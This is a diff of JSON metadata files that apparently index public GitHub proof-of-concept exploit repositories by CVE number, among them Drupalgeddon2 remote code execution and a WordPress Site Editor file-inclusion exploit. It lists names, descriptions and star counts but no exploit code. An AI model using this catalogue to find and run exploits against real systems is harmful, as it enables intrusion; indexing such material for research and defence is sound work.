"Elvin9\/NotSecDrv", + "owner": { + "login": "Elvin9", + "id": 10520535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10520535?v=4", + "html_url": "https:\/\/github.com\/Elvin9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Elvin9\/NotSecDrv", + "description": "A PoC for CVE-2018-7249", + "fork": false, + "created_at": "2018-02-21T20:31:09Z", + "updated_at": "2024-05-15T01:05:05Z", + "pushed_at": "2018-03-01T19:06:50Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7250.json b/2018/CVE-2018-7250.json new file mode 100644 index 0000000000..ec6a724dde --- /dev/null +++ b/2018/CVE-2018-7250.json @@ -0,0 +1,33 @@ +[ + { + "id": 122391619, + "name": "SecDrvPoolLeak", + "full_name": "Elvin9\/SecDrvPoolLeak", + "owner": { + "login": "Elvin9", + "id": 10520535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10520535?v=4", + "html_url": "https:\/\/github.com\/Elvin9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Elvin9\/SecDrvPoolLeak", + "description": "A PoC for CVE-2018-7250", + "fork": false, + "created_at": "2018-02-21T20:47:39Z", + "updated_at": "2020-10-21T22:15:43Z", + "pushed_at": "2018-02-27T11:10:01Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7273.json b/2018/CVE-2018-7273.json new file mode 100644 index 0000000000..883449be8d --- /dev/null +++ b/2018/CVE-2018-7273.json @@ -0,0 +1,33 @@ +[ + { + "id": 624816925, + "name": "CVE-2018-7273", + "full_name": "jedai47\/CVE-2018-7273", + "owner": { + "login": "jedai47", + "id": 47899257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47899257?v=4", + "html_url": "https:\/\/github.com\/jedai47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jedai47\/CVE-2018-7273", + "description": null, + "fork": false, + "created_at": "2023-04-07T10:25:17Z", + "updated_at": "2023-04-07T10:27:19Z", + "pushed_at": "2023-04-07T10:25:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7284.json b/2018/CVE-2018-7284.json new file mode 100644 index 0000000000..4aaafe0c9b --- /dev/null +++ b/2018/CVE-2018-7284.json @@ -0,0 +1,33 @@ +[ + { + "id": 208629466, + "name": "astDoS", + "full_name": "Rodrigo-D\/astDoS", + "owner": { + "login": "Rodrigo-D", + "id": 24864718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24864718?v=4", + "html_url": "https:\/\/github.com\/Rodrigo-D", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rodrigo-D\/astDoS", + "description": "Tool to exploit CVE-2018-7284 and CVE-2018-19278", + "fork": false, + "created_at": "2019-09-15T17:20:51Z", + "updated_at": "2019-09-15T17:59:08Z", + "pushed_at": "2019-09-15T17:59:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7422.json b/2018/CVE-2018-7422.json new file mode 100644 index 0000000000..1fb88d7ec6 --- /dev/null +++ b/2018/CVE-2018-7422.json @@ -0,0 +1,95 @@ +[ + { + "id": 156874990, + "name": "CVE-2018-7422", + "full_name": "0x00-0x00\/CVE-2018-7422", + "owner": { + "login": "0x00-0x00", + "id": 23364530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23364530?v=4", + "html_url": "https:\/\/github.com\/0x00-0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x00-0x00\/CVE-2018-7422", + "description": "Wordpress plugin Site-Editor v1.1.1 LFI exploit", + "fork": false, + "created_at": "2018-11-09T14:42:57Z", + "updated_at": "2019-09-27T14:14:03Z", + "pushed_at": "2018-11-09T14:43:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 429590107, + "name": "CVE-2018-7422", + "full_name": "jessisec\/CVE-2018-7422", + "owner": { + "login": "jessisec", + "id": 28818635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28818635?v=4", + "html_url": "https:\/\/github.com\/jessisec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jessisec\/CVE-2018-7422", + "description": "Site Editor WordPress Plugin <= 1.1.1 Local File Inclusion Script", + "fork": false, + "created_at": "2021-11-18T21:52:11Z", + "updated_at": "2024-11-12T03:01:13Z", + "pushed_at": "2021-11-18T21:55:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 575128363, + "name": "CVE-2018-7422", + "full_name": "JacobEbben\/CVE-2018-7422", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2018-7422", + "description": "Local File Inclusion in WordPress Plugin Site Editor 1.1.1", + "fork": false, + "created_at": "2022-12-06T20:23:57Z", + "updated_at": "2024-07-11T07:19:07Z", + "pushed_at": "2022-12-06T20:28:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7448.json b/2018/CVE-2018-7448.json new file mode 100644 index 0000000000..c78ec3af53 --- /dev/null +++ b/2018/CVE-2018-7448.json @@ -0,0 +1,33 @@ +[ + { + "id": 786299668, + "name": "exploit-cve-2018-7448", + "full_name": "b1d0ws\/exploit-cve-2018-7448", + "owner": { + "login": "b1d0ws", + "id": 58514930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58514930?v=4", + "html_url": "https:\/\/github.com\/b1d0ws", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1d0ws\/exploit-cve-2018-7448", + "description": "Python script for CMS Made Simple 2.1.6 - Remote Code Execution.", + "fork": false, + "created_at": "2024-04-14T02:56:47Z", + "updated_at": "2024-04-15T09:02:31Z", + "pushed_at": "2024-04-14T16:50:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7449.json b/2018/CVE-2018-7449.json new file mode 100644 index 0000000000..2e1cd7dac9 --- /dev/null +++ b/2018/CVE-2018-7449.json @@ -0,0 +1,33 @@ +[ + { + "id": 636653572, + "name": "CVE-2018-7449", + "full_name": "antogit-sys\/CVE-2018-7449", + "owner": { + "login": "antogit-sys", + "id": 64706936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64706936?v=4", + "html_url": "https:\/\/github.com\/antogit-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/antogit-sys\/CVE-2018-7449", + "description": "simple Python exploit using CVE-2018-7449 on embOS\/IP FTP Server v3.22", + "fork": false, + "created_at": "2023-05-05T10:38:23Z", + "updated_at": "2024-05-29T14:45:09Z", + "pushed_at": "2023-05-08T08:18:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7489.json b/2018/CVE-2018-7489.json new file mode 100644 index 0000000000..9f419e3372 --- /dev/null +++ b/2018/CVE-2018-7489.json @@ -0,0 +1,33 @@ +[ + { + "id": 158225407, + "name": "CVE-2018-7489", + "full_name": "tafamace\/CVE-2018-7489", + "owner": { + "login": "tafamace", + "id": 45160113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tafamace\/CVE-2018-7489", + "description": null, + "fork": false, + "created_at": "2018-11-19T13:13:27Z", + "updated_at": "2018-11-19T13:23:28Z", + "pushed_at": "2018-11-19T13:23:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7490.json b/2018/CVE-2018-7490.json new file mode 100644 index 0000000000..c576a4ac16 --- /dev/null +++ b/2018/CVE-2018-7490.json @@ -0,0 +1,33 @@ +[ + { + "id": 814936310, + "name": "uWSGI-CVE-2018-7490-POC", + "full_name": "qinzhu111\/uWSGI-CVE-2018-7490-POC", + "owner": { + "login": "qinzhu111", + "id": 170609894, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170609894?v=4", + "html_url": "https:\/\/github.com\/qinzhu111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qinzhu111\/uWSGI-CVE-2018-7490-POC", + "description": null, + "fork": false, + "created_at": "2024-06-14T02:50:35Z", + "updated_at": "2024-06-14T02:52:15Z", + "pushed_at": "2024-06-14T02:51:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-7600.json b/2018/CVE-2018-7600.json new file mode 100644 index 0000000000..30740c0a84 --- /dev/null +++ b/2018/CVE-2018-7600.json @@ -0,0 +1,1147 @@ +[ + { + "id": 127405676, + "name": "CVE-2018-7600-Drupal-RCE", + "full_name": "g0rx\/CVE-2018-7600-Drupal-RCE", + "owner": { + "login": "g0rx", + "id": 10961397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10961397?v=4", + "html_url": "https:\/\/github.com\/g0rx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g0rx\/CVE-2018-7600-Drupal-RCE", + "description": "CVE-2018-7600 Drupal RCE", + "fork": false, + "created_at": "2018-03-30T08:52:54Z", + "updated_at": "2024-08-12T19:37:20Z", + "pushed_at": "2018-04-18T06:58:39Z", + "stargazers_count": 115, + "watchers_count": 115, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 115, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 127436541, + "name": "CVE-2018-7600", + "full_name": "a2u\/CVE-2018-7600", + "owner": { + "login": "a2u", + "id": 1529979, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1529979?v=4", + "html_url": "https:\/\/github.com\/a2u", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/a2u\/CVE-2018-7600", + "description": "💀Proof-of-Concept for CVE-2018-7600 Drupal SA-CORE-2018-002", + "fork": false, + "created_at": "2018-03-30T14:23:18Z", + "updated_at": "2024-11-13T23:38:32Z", + "pushed_at": "2019-03-29T11:25:57Z", + "stargazers_count": 349, + "watchers_count": 349, + "has_discussions": false, + "forks_count": 108, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-7600", + "drupal", + "drupalgeddon2", + "exploit", + "poc", + "sa-core-2018-002" + ], + "visibility": "public", + "forks": 108, + "watchers": 349, + "score": 0, + "subscribers_count": 77 + }, + { + "id": 129319611, + "name": "Drupalgeddon2", + "full_name": "dreadlocked\/Drupalgeddon2", + "owner": { + "login": "dreadlocked", + "id": 7407033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7407033?v=4", + "html_url": "https:\/\/github.com\/dreadlocked", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dreadlocked\/Drupalgeddon2", + "description": "Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 \/ CVE-2018-7600 \/ SA-CORE-2018-002)", + "fork": false, + "created_at": "2018-04-12T22:53:14Z", + "updated_at": "2024-11-17T03:04:34Z", + "pushed_at": "2021-01-08T10:31:22Z", + "stargazers_count": 579, + "watchers_count": 579, + "has_discussions": false, + "forks_count": 173, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-7600", + "drupal", + "drupal7", + "drupal8", + "drupalgeddon", + "drupalgeddon2", + "exploit", + "poc", + "sa-core-2018-002" + ], + "visibility": "public", + "forks": 173, + "watchers": 579, + "score": 0, + "subscribers_count": 23 + }, + { + "id": 129384553, + "name": "CVE-2018-7600", + "full_name": "knqyf263\/CVE-2018-7600", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2018-7600", + "description": "CVE-2018-7600 (Drupal)", + "fork": false, + "created_at": "2018-04-13T10:04:36Z", + "updated_at": "2020-04-04T18:09:28Z", + "pushed_at": "2018-11-17T14:47:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 129500604, + "name": "CVE-2018-7600-Drupal-0day-RCE", + "full_name": "dr-iman\/CVE-2018-7600-Drupal-0day-RCE", + "owner": { + "login": "dr-iman", + "id": 25507113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25507113?v=4", + "html_url": "https:\/\/github.com\/dr-iman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dr-iman\/CVE-2018-7600-Drupal-0day-RCE", + "description": "Drupal 0day Remote PHP Code Execution (Perl)", + "fork": false, + "created_at": "2018-04-14T09:02:54Z", + "updated_at": "2024-08-12T19:37:45Z", + "pushed_at": "2018-04-14T09:06:44Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 129514721, + "name": "drupalgeddon2", + "full_name": "jirojo2\/drupalgeddon2", + "owner": { + "login": "jirojo2", + "id": 3594710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3594710?v=4", + "html_url": "https:\/\/github.com\/jirojo2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jirojo2\/drupalgeddon2", + "description": "MSF exploit module for Drupalgeddon 2 (CVE-2018-7600 \/ SA-CORE-2018-002)", + "fork": false, + "created_at": "2018-04-14T12:26:10Z", + "updated_at": "2018-04-26T08:15:06Z", + "pushed_at": "2018-04-14T23:48:33Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 129543577, + "name": "CVE-2018-7600", + "full_name": "dwisiswant0\/CVE-2018-7600", + "owner": { + "login": "dwisiswant0", + "id": 25837540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25837540?v=4", + "html_url": "https:\/\/github.com\/dwisiswant0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dwisiswant0\/CVE-2018-7600", + "description": "PoC for CVE-2018-7600 Drupal SA-CORE-2018-002 (Drupalgeddon 2).", + "fork": false, + "created_at": "2018-04-14T18:26:26Z", + "updated_at": "2023-09-08T17:39:18Z", + "pushed_at": "2018-04-14T20:52:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 129569913, + "name": "CVE-2018-7600", + "full_name": "thehappydinoa\/CVE-2018-7600", + "owner": { + "login": "thehappydinoa", + "id": 30162978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30162978?v=4", + "html_url": "https:\/\/github.com\/thehappydinoa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thehappydinoa\/CVE-2018-7600", + "description": "Proof-of-Concept for Drupal CVE-2018-7600 \/ SA-CORE-2018-002", + "fork": false, + "created_at": "2018-04-15T02:21:59Z", + "updated_at": "2023-07-18T15:07:05Z", + "pushed_at": "2023-07-18T15:04:36Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-poc", + "drupal" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 129605925, + "name": "CVE-2018-7600", + "full_name": "sl4cky\/CVE-2018-7600", + "owner": { + "login": "sl4cky", + "id": 13188087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13188087?v=4", + "html_url": "https:\/\/github.com\/sl4cky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sl4cky\/CVE-2018-7600", + "description": "Testing and exploitation tool for Drupalgeddon 2 (CVE-2018-7600)", + "fork": false, + "created_at": "2018-04-15T12:01:41Z", + "updated_at": "2024-08-12T19:37:47Z", + "pushed_at": "2018-04-15T12:31:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 129620689, + "name": "CVE-2018-7600-Masschecker", + "full_name": "sl4cky\/CVE-2018-7600-Masschecker", + "owner": { + "login": "sl4cky", + "id": 13188087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13188087?v=4", + "html_url": "https:\/\/github.com\/sl4cky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sl4cky\/CVE-2018-7600-Masschecker", + "description": "Tool to check for CVE-2018-7600 vulnerability on several URLS", + "fork": false, + "created_at": "2018-04-15T14:56:35Z", + "updated_at": "2020-07-09T18:52:40Z", + "pushed_at": "2018-04-15T14:58:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 129800155, + "name": "CVE-2018-7600", + "full_name": "firefart\/CVE-2018-7600", + "owner": { + "login": "firefart", + "id": 105281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105281?v=4", + "html_url": "https:\/\/github.com\/firefart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/firefart\/CVE-2018-7600", + "description": "CVE-2018-7600 - Drupal 7.x RCE", + "fork": false, + "created_at": "2018-04-16T20:16:21Z", + "updated_at": "2024-08-12T19:37:49Z", + "pushed_at": "2018-04-18T20:34:19Z", + "stargazers_count": 71, + "watchers_count": 71, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 71, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 129927277, + "name": "CVE-2018-7600", + "full_name": "pimps\/CVE-2018-7600", + "owner": { + "login": "pimps", + "id": 11393266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11393266?v=4", + "html_url": "https:\/\/github.com\/pimps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pimps\/CVE-2018-7600", + "description": "Exploit for Drupal 7 <= 7.57 CVE-2018-7600", + "fork": false, + "created_at": "2018-04-17T15:38:15Z", + "updated_at": "2024-11-07T00:15:54Z", + "pushed_at": "2018-04-26T15:40:28Z", + "stargazers_count": 130, + "watchers_count": 130, + "has_discussions": false, + "forks_count": 64, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 64, + "watchers": 130, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 130154422, + "name": "drupalgeddon2", + "full_name": "lorddemon\/drupalgeddon2", + "owner": { + "login": "lorddemon", + "id": 6675738, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6675738?v=4", + "html_url": "https:\/\/github.com\/lorddemon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lorddemon\/drupalgeddon2", + "description": "Exploit for CVE-2018-7600.. called drupalgeddon2, ", + "fork": false, + "created_at": "2018-04-19T03:31:47Z", + "updated_at": "2024-08-12T19:37:52Z", + "pushed_at": "2018-04-19T03:38:24Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "drupalgeddon2" + ], + "visibility": "public", + "forks": 15, + "watchers": 9, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 130868059, + "name": "drupal-check", + "full_name": "Hestat\/drupal-check", + "owner": { + "login": "Hestat", + "id": 22892300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22892300?v=4", + "html_url": "https:\/\/github.com\/Hestat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hestat\/drupal-check", + "description": "Tool to dive Apache logs for evidence of exploitation of CVE-2018-7600", + "fork": false, + "created_at": "2018-04-24T14:34:46Z", + "updated_at": "2018-07-08T12:46:15Z", + "pushed_at": "2018-05-08T17:30:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 131665156, + "name": "drupalgeddon-2", + "full_name": "Damian972\/drupalgeddon-2", + "owner": { + "login": "Damian972", + "id": 25445518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25445518?v=4", + "html_url": "https:\/\/github.com\/Damian972", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Damian972\/drupalgeddon-2", + "description": "Vuln checker for Drupal v7.x + v8.x (CVE-2018-7600 \/ SA-CORE-2018-002)", + "fork": false, + "created_at": "2018-05-01T01:38:43Z", + "updated_at": "2019-02-28T05:09:20Z", + "pushed_at": "2018-05-03T01:23:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 134812138, + "name": "CVE-2018-7600", + "full_name": "soch4n\/CVE-2018-7600", + "owner": { + "login": "soch4n", + "id": 20456656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20456656?v=4", + "html_url": "https:\/\/github.com\/soch4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soch4n\/CVE-2018-7600", + "description": null, + "fork": false, + "created_at": "2018-05-25T06:19:05Z", + "updated_at": "2018-05-25T06:20:54Z", + "pushed_at": "2018-05-25T06:20:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 140643631, + "name": "CVE-2018-7600", + "full_name": "happynote3966\/CVE-2018-7600", + "owner": { + "login": "happynote3966", + "id": 19719330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19719330?v=4", + "html_url": "https:\/\/github.com\/happynote3966", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/happynote3966\/CVE-2018-7600", + "description": null, + "fork": false, + "created_at": "2018-07-12T01:12:44Z", + "updated_at": "2018-07-17T03:24:11Z", + "pushed_at": "2018-07-17T03:24:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 151199861, + "name": "CVE-2018-7600-Drupal-RCE", + "full_name": "shellord\/CVE-2018-7600-Drupal-RCE", + "owner": { + "login": "shellord", + "id": 2632896, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2632896?v=4", + "html_url": "https:\/\/github.com\/shellord", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shellord\/CVE-2018-7600-Drupal-RCE", + "description": "MASS Exploiter", + "fork": false, + "created_at": "2018-10-02T04:25:02Z", + "updated_at": "2023-07-12T11:57:06Z", + "pushed_at": "2019-10-17T15:56:56Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 154401051, + "name": "CVE-2018-7600", + "full_name": "r3dxpl0it\/CVE-2018-7600", + "owner": { + "login": "r3dxpl0it", + "id": 43002597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43002597?v=4", + "html_url": "https:\/\/github.com\/r3dxpl0it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3dxpl0it\/CVE-2018-7600", + "description": "CVE-2018-7600 POC (Drupal RCE)", + "fork": false, + "created_at": "2018-10-23T21:47:59Z", + "updated_at": "2024-05-10T18:30:28Z", + "pushed_at": "2020-08-31T14:52:37Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 164355216, + "name": "cve-2018-7600", + "full_name": "cved-sources\/cve-2018-7600", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2018-7600", + "description": "cve-2018-7600", + "fork": false, + "created_at": "2019-01-06T23:41:33Z", + "updated_at": "2021-04-15T21:33:42Z", + "pushed_at": "2021-04-15T21:33:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 175778651, + "name": "codeql-scanner", + "full_name": "madneal\/codeql-scanner", + "owner": { + "login": "madneal", + "id": 12164075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12164075?v=4", + "html_url": "https:\/\/github.com\/madneal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/madneal\/codeql-scanner", + "description": "The exploit python script for CVE-2018-7600", + "fork": false, + "created_at": "2019-03-15T08:24:27Z", + "updated_at": "2021-02-24T11:42:04Z", + "pushed_at": "2021-02-24T11:42:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 177401018, + "name": "drupal-exploit", + "full_name": "drugeddon\/drupal-exploit", + "owner": { + "login": "drugeddon", + "id": 48880451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48880451?v=4", + "html_url": 